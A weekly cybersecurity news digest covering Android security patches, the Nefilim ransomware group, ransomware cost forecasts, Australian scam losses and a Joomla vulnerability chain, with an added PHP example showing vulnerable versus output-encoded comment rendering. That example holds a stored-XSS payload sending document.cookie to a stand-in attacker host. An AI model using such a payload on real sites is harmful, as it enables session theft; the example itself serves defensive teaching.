
Weekly News Digest #38

Critical Android RCE Bug patched by Google

Google's June Security Bulletin addresses more than 90 bugs, among them a critical remote code execution flaw that could let an attacker take over a targeted device. The bug, tracked as CVE-2021-0507, sits in the Android System component; successful exploitation would allow arbitrary code execution in the context of a privileged process. Google also lists a second bug in the same component, CVE-2021-0516, but has published no further details about it.

Several high-severity elevation-of-privilege (EoP) issues were also fixed. One of them, in the Android runtime and tracked as CVE-2021-0511, could let a local attacker execute arbitrary code and gain additional permissions while bypassing the usual user-interaction requirements. Google also patched several high-severity information-disclosure bugs in Android.


Nefilim, a ransomware group targeting companies with $1bn+ revenue: case study

The group relies on "double extortion" to push victim organizations into paying: data is stolen before it is encrypted, so the victim is pressured both by the loss of access and by the threat of publication. Ransomware is malware that encrypts files on the victim's own systems. Machines become infected through phishing messages, stolen access credentials, unpatched vulnerabilities or other means. Opening the encrypted files requires a decryption key, which the attackers offer in exchange for a ransom. Demands can reach several million USD when the victim is a large corporation. Nothing guarantees, however, that the key handed over after payment will actually decrypt the files.

The research on Nefilim was published by Trend Micro, whose analysts believe the group is an offshoot of Nemty, a ransomware-as-a-service (RaaS) outfit. According to Trend Micro, Nefilim first appeared in March 2020. Nemty ran a subscription (RaaS) programme which, according to Sentinel Labs, split proceeds 70/30 with affiliates, moving to 90/10 when an affiliate landed high-profile victims. For initial access, Nefilim relies on exposed Remote Desktop Services and on public proof-of-concept exploit code for known vulnerabilities; the operators also use stolen credentials to get into corporate networks.


$265 billion – the predicted cost of ransomware attacks worldwide in the next decade

By 2031, the global cost of ransomware attacks is predicted to rise dramatically and reach $265 billion. Operators no longer merely encrypt data and demand a ransom; they also threaten to publish the stolen files unless the victim pays the stated amount, which doubles the pressure to pay up. The most active ransomware groups at present are Maze, Nefilim, DarkSide and Clop; DarkSide left the scene after extorting Colonial Pipeline. Ransomware attacks occur worldwide at a rate of roughly one every few seconds (on the same forecast, one every 2 seconds by 2031).

Cybersecurity Ventures puts the current annual cost of ransomware at $20 billion, roughly 50 times the 2015 figure, and the $265 billion forecast assumes that damage costs keep growing by about 30% a year. The estimate covers ransom payouts, insurance premiums, system repair and restoration costs, fees paid to cyberforensics firms, data loss and other components. Notably, it also includes the reputational damage suffered by victims.


AU$26.5m in cryptocurrency spent by Australians as payments to scammers in 2020

The ACCC's Scamwatch received 216,087 scam reports in the 2020 calendar year. Combining Scamwatch with reports to other government agencies and Australia's major financial institutions, Australians reported losing AU$851 million to scams in total. Investment scams topped the list at AU$328 million (a figure that drops to AU$156 million when the data contributed by the top financial institutions is excluded). Business email compromise accounted for AU$128 million, remote access scams for AU$8.4 million and identity theft for AU$3.1 million.

The most common payment method used in scams was bank transfer, accounting for AU$97 million in losses, with cryptocurrencies such as Bitcoin the second most common. The highest losses were suffered by people aged over 65.


Joomla CMS dual-vulnerability combo could lead to full system compromise

Joomla is a popular open-source content management system. Researchers at Fortbridge disclosed two vulnerabilities in it, a stored cross-site scripting (XSS) flaw and a weakness in the password reset flow, which an attacker could chain to fully compromise the system. Fortbridge reported both issues to the Joomla project at the beginning of this year.

Joomla patched the cross-site scripting flaw after being notified, but the password reset issue remains unpatched. Both vulnerabilities are rated high severity. An attacker who chains them to take full control of a Joomla site can then go on to execute commands on the underlying server.
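To make the stored XSS half of that chain concrete, here is an added example written for this digest; it is not Joomla's code and does not reproduce the Fortbridge finding. It assumes a hypothetical comment feature whose stored entries are rendered into an admin-visible page, with the attacker's comment constructed inline. The vulnerable renderer echoes stored input straight into HTML; the hardened one HTML-encodes every untrusted value at render time.

```php
<?php
// Added example, not Joomla's code. Assumption: a hypothetical comment
// feature whose stored entries are later rendered on a page an
// administrator views. The comments below are constructed sample data.

declare(strict_types=1);

// VULNERABLE: stored user input is interpolated directly into markup.
// Whatever the attacker saved is parsed as HTML by the viewer's browser.
function render_comment_vulnerable(string $author, string $body): string
{
    return "<div class=\"comment\"><b>$author</b>: $body</div>";
}

// Context-aware encoder for HTML body / attribute text. ENT_QUOTES covers
// both quote styles, ENT_SUBSTITUTE avoids returning "" on bad UTF-8
// (which would otherwise silently drop content), ENT_HTML5 picks the
// HTML5 entity table.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// HARDENED: same template, but every untrusted value is encoded on output.
function render_comment_hardened(string $author, string $body): string
{
    return '<div class="comment"><b>' . esc($author) . '</b>: ' . esc($body) . '</div>';
}

// Constructed stored comments. The second one is the kind of payload an
// attacker submits through the public form; when an administrator later
// views the page, the script runs with the administrator's session.
$storedComments = [
    ['author' => 'alice',   'body' => 'Nice article.'],
    ['author' => 'mallory', 'body' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'],
];

foreach ($storedComments as $c) {
    echo "VULNERABLE: " . render_comment_vulnerable($c['author'], $c['body']) . "\n";
    echo "HARDENED:   " . render_comment_hardened($c['author'], $c['body']) . "\n";
}

// Sanity check a reviewer can keep in a unit test: the hardened renderer
// must never emit a tag or an event-handler attribute from user input.
$out = render_comment_hardened('mallory', $storedComments[1]['body']);
assert(strpos($out, '<img') === false && strpos($out, 'onerror=') === false);
```

The point of the example is where the fix lives: encoding at storage time is not enough, because the same stored string may later be emitted into a different context (an attribute, a script block, JSON), and a stored XSS that reaches an administrator's browser lets the attacker perform any action that administrator can, which is what turns a "harmless" comment field into a site takeover once a second weakness (such as a password reset flaw) is available to chain.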

